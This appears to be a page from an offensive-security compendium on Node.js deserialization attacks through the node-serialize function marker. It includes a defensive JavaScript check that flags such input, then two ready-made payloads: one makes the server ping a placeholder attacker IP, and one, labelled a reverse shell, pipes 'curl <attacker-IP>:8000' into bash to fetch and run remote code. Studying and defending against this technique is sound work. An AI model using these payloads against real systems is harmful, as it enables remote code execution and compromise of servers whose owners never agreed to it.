killchain-compendium/exploit/web/nodejs/deserialization.md

De/Serialization

  • A string value prefixed with _$$ND_FUNC$$_ is treated as function source and evaluated after the JSON is parsed; written as an immediately invoked function (_$$ND_FUNC$$_function (){}()), its body runs at deserialization time
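The defensive counterpart of the note above, as an added example that is not part of the compendium: untrusted input is parsed with plain JSON.parse (which never evaluates function strings), then walked for any string carrying the _$$ND_FUNC$$_ marker before it can reach a deserializer. The `}()` suffix test for the self-invoking form and the sample inputs are assumptions constructed for this example.

```javascript
// Added example (not from the compendium): reject untrusted JSON carrying the
// function marker before it is ever handed to an unserialize() call.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Walk a parsed JSON value and collect every string that starts with the
// marker. Each finding records the JSON path and whether the serialized
// function is immediately invoked (assumed form: body ends with "}()"),
// which is the shape that executes during deserialization.
function findFunctionMarkers(value, path = '$', findings = []) {
  if (typeof value === 'string') {
    if (value.startsWith(FUNC_MARKER)) {
      findings.push({ path, selfInvoking: /\}\s*\(\s*\)\s*$/.test(value) });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findFunctionMarkers(v, `${path}[${i}]`, findings));
  } else if (value !== null && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      findFunctionMarkers(v, `${path}.${k}`, findings);
    }
  }
  return findings;
}

// Parse a raw request body with JSON.parse only, then refuse it if any
// marker is present. Returns { ok, value, findings } so the caller can log
// the finding paths and reject the request.
function safeParseUntrusted(raw) {
  let value;
  try {
    value = JSON.parse(raw);
  } catch (e) {
    return { ok: false, value: undefined, findings: [], error: 'invalid JSON' };
  }
  const findings = findFunctionMarkers(value);
  return { ok: findings.length === 0, value, findings };
}

// Constructed samples: a benign session object, and one with a harmless
// self-invoking function under the marker (same shape as the payloads
// below, with the command replaced by "return 1").
const BENIGN = JSON.stringify({ user: 'alice', roles: ['viewer'] });
const MARKED = JSON.stringify({ pwn: `${FUNC_MARKER}function () { return 1 }()` });

console.log(safeParseUntrusted(BENIGN).ok);                 // true
console.log(JSON.stringify(safeParseUntrusted(MARKED).findings)); // [{"path":"$.pwn","selfInvoking":true}]
```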

Example Payloads

  • Encode, send, and wait for the ICMP echo with sudo tcpdump -i <interface> icmp

```json
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```

  • Reverse shell via curl | bash:

```json
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```